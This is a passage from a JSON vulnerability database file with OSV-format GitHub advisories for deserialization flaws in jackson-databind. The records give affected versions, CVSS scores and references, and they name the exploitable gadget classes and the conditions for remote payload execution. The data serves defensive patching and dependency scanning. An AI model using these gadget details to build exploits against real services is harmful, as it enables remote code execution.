"2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-cvm9-fjm9-3572/GHSA-cvm9-fjm9-3572.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-cvm9-fjm9-3572/GHSA-cvm9-fjm9-3572.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36181" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { 
"type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:23Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f3j5-rmmp-3fc5", "published": "2020-06-15T18:44:48Z", "modified": "2024-03-15T05:20:35.120151Z", "aliases": [ "CVE-2019-17267" ], "summary": "Improper Input Validation in jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10 and 2.8.11.5. 
It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-f3j5-rmmp-3fc5/GHSA-f3j5-rmmp-3fc5.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", 
"2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-f3j5-rmmp-3fc5/GHSA-f3j5-rmmp-3fc5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17267" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2460" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191017-0006" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00013.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d727fc681fb3828794acbefcaee31393742b4d73a29461ccd9597a8@%3Cdev.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T21:47:17Z", "nvd_published_at": "2019-10-07T00:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f9hv-mg5h-xcw9", "published": "2019-01-04T19:06:57Z", "modified": "2024-03-12T05:18:23.439473Z", "aliases": [ "CVE-2018-19360" ], "summary": "Deserialization of Untrusted Data in jackson-databind due to polymorphic deserialization", "details": "FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.8" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7" ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-f9hv-mg5h-xcw9/GHSA-f9hv-mg5h-xcw9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-f9hv-mg5h-xcw9/GHSA-f9hv-mg5h-xcw9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-f9hv-mg5h-xcw9/GHSA-f9hv-mg5h-xcw9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19360" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-f9hv-mg5h-xcw9" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/TINKERPOP-2121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107985" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:16Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f9xh-2qgp-cq57", "published": "2021-12-09T19:16:42Z", "modified": "2024-02-18T05:32:05.421673Z", "aliases": [ "CVE-2020-36188" ], "summary": "Unsafe 
Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-f9xh-2qgp-cq57/GHSA-f9xh-2qgp-cq57.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", 
"2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-f9xh-2qgp-cq57/GHSA-f9xh-2qgp-cq57.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36188" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2996" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:25:02Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", 
"id": "GHSA-fmmc-742q-jg75", "published": "2019-11-13T00:32:27Z", "modified": "2024-03-16T05:19:55.172981Z", "aliases": [ "CVE-2019-16943" ], "summary": "jackson-databind polymorphic typing issue", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 prior to 2.9.10.1, 2.8.11.5, and 2.6.7.3. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-fmmc-742q-jg75/GHSA-fmmc-742q-jg75.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", 
"2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-fmmc-742q-jg75/GHSA-fmmc-742q-jg75.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-fmmc-742q-jg75/GHSA-fmmc-742q-jg75.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16943" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2478" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/328a0f833daf6baa443ac3b37c818a0204714b0b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bc67eb11a7cf57561f861ff16f879f1fceb5779f" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191017-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6788e4c991f75b89d290ad06b463fcd30bcae99fee610345a35b7bc6@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ec8d8d485c2c8ac55ea425f4cd96596ef37312532712639712ebcdd@%3Ccommits.iceberg.apache.org%3E" }, 
